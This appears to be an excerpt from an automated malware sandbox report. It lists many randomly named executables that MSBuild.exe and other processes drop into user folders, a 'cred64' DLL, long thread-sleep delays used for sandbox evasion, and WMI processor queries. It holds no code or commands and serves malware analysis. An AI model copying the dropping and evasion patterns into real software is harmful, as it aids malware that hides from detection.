Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\fCvVPrm4SypzMQ6EiBEadgs1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\XJI9AFzBIfKNprDgZXpUs99e.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\QxCv5P4RWl5NZ4tvZO0mZrz2.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5ps.0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\kj4vlWepIIui5EUsEpaKN5uf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\NzMhoMiQShLnUxfisrCBpUcg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\UqEUiSMhaNIUaul1PMLhCUwN.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\dUJDpd3reHboCY5zymPoYWZb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\yB6Uf0WkvSc9vwkxXb9qHuqG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\uOTCOcyWGW2C0V1L0OAjLfFo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\QHSpBJfT7rENIQ9ncyZXQ7Pm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\7oogYDdOsBiWJ9MKZ1L5HbFc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\FUb10VYVGNCyaJzEYAYj3GQs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\dAQPk6VJcRnzNryadPob76ur.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\VScSUh49U4ILUy7wHZccpWfB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\s72QQ1HEDtqfs0ltMB4uulZT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\yhDNs5CKgcvWpHQdXrg6et6I.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\b7aAk4NsmjOyCEFaPAgyoXSd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\AyNYT4O47VfBk09nQnrCijm6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\bhUVpYwvm9Cx2G2Rs1dNzx32.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ilujg24U0DrNyFRHYG8F01Xq.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\p2n3E86Xy4ldROofshdOCL5V.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\eVxkDSvCJmjQQtpfadM6vVRZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\tqElYl8Fl4JU3kvWVy6e00VW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\j5y10uqj39KWgJqNPePuwKtH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\PX9pw9BSDC6GcNiwEOwN9eIo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\swiiii[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\RTdjK9qJEXQ928Kc9bfdj8uO.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\l9eBjdHLCrnnkZZKJdDffPtE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\lGY9WNr93099Iipz5J2xUIwU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\fNXuIJPtZ25Cf8AC2M7nLhvu.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\ngPRyE3pVf7AVqsG4El6sbei.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\dG8PuyJTCxed1f6M5xR2MLtX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Mpw4JlCHhiliCOOFY4izjnxd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\szmZp5wR4ysalkWrHfDx3ALH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\QOC4MrQyBEQHndqZcvBUgBgA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\EwtRoEOPYdd062EDD7ELX587.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\NXiJY5ksTtPuwWHLdp7c611m.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\pVHGmT1xb3UJCnVvgRWBUZ7Y.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\oda8FFwXlvLarxOY0ZoPcs8X.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\rig4vLmrODGxubaXNA7eu9mO.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

API coverage: 1.4 %

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5480	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5480	Thread sleep time: -226113s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5020	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5020	Thread sleep time: -238119s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5048	Thread sleep count: 122 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5048	Thread sleep time: -244122s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 6724	Thread sleep count: 1566 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 6724	Thread sleep time: -46980000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 6736	Thread sleep count: 106 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 6736	Thread sleep time: -212106s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5036	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5036	Thread sleep time: -198099s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5064	Thread sleep count: 115 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5064	Thread sleep time: -230115s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 2792	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 2792	Thread sleep time: -226113s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5056	Thread sleep count: 112 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 5056	Thread sleep time: -224112s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 1056	Thread sleep time: -1440000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 6724	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe TID: 5464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960	Thread sleep count: 245 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960	Thread sleep time: -245000s >= -30000s
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe TID: 1824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe TID: 3632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2120	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3428	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe TID: 404	Thread sleep count: 1340 > 30
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe TID: 404	Thread sleep time: -40200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe TID: 6968	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe TID: 404	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3632	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7604	Thread sleep count: 1137 > 30
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7604	Thread sleep time: -2275137s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7596	Thread sleep count: 1112 > 30
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7596	Thread sleep time: -2225112s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7588	Thread sleep count: 1119 > 30
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7588	Thread sleep time: -2239119s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7584	Thread sleep count: 1142 > 30
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7584	Thread sleep time: -2285142s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7592	Thread sleep count: 1118 > 30
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7592	Thread sleep time: -2237118s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7576	Thread sleep count: 1153 > 30
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7576	Thread sleep time: -2307153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe TID: 7492	Thread sleep count: 330 > 30
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe TID: 7500	Thread sleep time: -31000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep count: 353 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5984	Thread sleep count: 65 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -599453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -598969s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -598625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -598266s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -597840s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -597503s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -597191s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -596342s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -595967s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -595561s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -595217s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -594623s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -594123s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -593717s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7916	Thread sleep time: -1500000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -593117s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -592367s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -591496s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -590804s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -589711s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -588630s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -584595s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -583277s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -581637s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -580105s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -578479s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -576757s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -574695s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -572735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -570520s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -566034s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -563979s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -561729s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -559187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -556505s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -554105s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -549013s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -545765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -542766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -539749s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -536749s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -531088s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -527853s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -524644s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -521393s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -517771s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -355523s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -268824s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -267590s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5032	Thread sleep count: 59 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -599243s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -598784s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8092	Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -598472s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -597920s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -597498s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -597014s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -596592s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -595904s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -595404s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -594998s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -594398s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -593648s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -592777s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -592085s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -590992s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -589911s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -585876s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -584558s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -582918s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -581386s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -579760s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -578038s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -575976s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -574016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -571801s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -567315s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -565260s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -563010s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -560468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -557786s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -555386s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -550294s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -547046s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -544047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -541030s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -538030s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -532369s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -529134s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -525925s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -522674s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -519052s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -343741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7280	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Last function: Thread delayed
